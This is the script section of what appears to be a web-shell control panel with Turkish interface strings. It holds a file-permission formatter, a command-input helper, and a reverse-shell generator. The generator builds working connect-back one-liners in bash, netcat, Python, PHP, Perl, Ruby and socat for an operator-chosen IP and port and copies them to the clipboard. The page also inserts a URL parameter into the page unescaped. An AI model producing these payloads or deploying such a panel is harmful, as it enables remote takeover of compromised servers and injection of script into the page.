(!permsOctalStr || permsOctalStr === '????') return 'Unknown'; const perms = parseInt(permsOctalStr, 8); if (isNaN(perms)) return 'Invalid'; let info = ''; if ((perms & 0xC000) === 0xC000) { info = 's'; } else if ((perms & 0xA000) === 0xA000) { info = 'l'; } else if ((perms & 0x8000) === 0x8000) { info = '-'; } else if ((perms & 0x6000) === 0x6000) { info = 'b'; } else if ((perms & 0x4000) === 0x4000) { info = 'd'; } else if ((perms & 0x2000) === 0x2000) { info = 'c'; } else if ((perms & 0x1000) === 0x1000) { info = 'p'; } else { info = 'u'; } info += ((perms & 0x0100) ? 'r' : '-'); info += ((perms & 0x0080) ? 'w' : '-'); info += ((perms & 0x0040) ? ((perms & 0x0800) ? 's' : 'x' ) : ((perms & 0x0800) ? 'S' : '-')); info += ((perms & 0x0020) ? 'r' : '-'); info += ((perms & 0x0010) ? 'w' : '-'); info += ((perms & 0x0008) ? ((perms & 0x0400) ? 's' : 'x' ) : ((perms & 0x0400) ? 'S' : '-')); info += ((perms & 0x0004) ? 'r' : '-'); info += ((perms & 0x0002) ? 'w' : '-'); info += ((perms & 0x0001) ? ((perms & 0x0200) ? 't' : 'x' ) : ((perms & 0x0200) ? 'T' : '-')); return info; } document.querySelectorAll('.perms').forEach(el => { el.title = perms_to_string_js(el.textContent); }); function setCmd(cmd) { document.getElementById('command_input').value = cmd; } function generateShell(event) { /* ... Reverse Shell JS Kodu ... */ event.preventDefault(); const ip = document.getElementById('rev_ip').value; const port = document.getElementById('rev_port').value; const type = document.getElementById('shell_type').value; let command = ''; if (!ip || !port) { alert('IP ve Port gir!'); return; } switch(type) { case 'bash_tcp': command = `bash -i >& /dev/tcp/${ip}/${port} 0>&1`; break; case 'nc_e': command = `nc -e /bin/bash ${ip} ${port}`; break; case 'nc_mkfifo': command = `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ${ip} ${port} >/tmp/f`; break; case 'python3': command = `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("${ip}",${port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'`; break; case 'php': command = `php -r '$sock=fsockopen("${ip}",${port});exec("/bin/bash -i <&3 >&3 2>&3");'`; break; case 'perl': command = `perl -e 'use Socket;$i="${ip}";$p=${port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'`; break; case 'ruby': command = `ruby -rsocket -e'f=TCPSocket.open("${ip}",${port}).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'`; break; case 'socat': command = `socat tcp-connect:${ip}:${port} exec:/bin/bash,pty,stderr,setsid,sigint,sane`; break; default: command = 'Unknown type'; } const outputArea = document.getElementById('generated_shell_output'); outputArea.textContent = command; outputArea.style.display = 'block'; const selection = window.getSelection(); const range = document.createRange(); range.selectNodeContents(outputArea); selection.removeAllRanges(); selection.addRange(range); try { document.execCommand('copy'); alert('Komut kopyalandı!'); } catch (err) { alert('Manuel kopyala!'); } } // URL'den gelen mesajı göster document.addEventListener('DOMContentLoaded', function() { const urlParams = new URLSearchParams(window.location.search); const msg = urlParams.get('msg'); const msgType = urlParams.get('msg_type'); if (msg) { const msgDiv = document.createElement('div'); msgDiv.className = 'message ' + (msgType || 'info'); msgDiv.innerHTML = '<i class="fas fa-info-circle"></i> ' + decodeURIComponent(msg.replace(/\+/g, ' ')); document.querySelector('.breadcrumb').insertAdjacentElement('afterend', msgDiv); setTimeout(() => { if(msgDiv) msgDiv.style.display='none'; }, 4000); const currentUrl = new URL(window.location); currentUrl.searchParams.delete('msg'); currentUrl.searchParams.delete('msg_type'); history.replaceState(null, '', currentUrl.toString()); } }); </script> </body> </html>
Save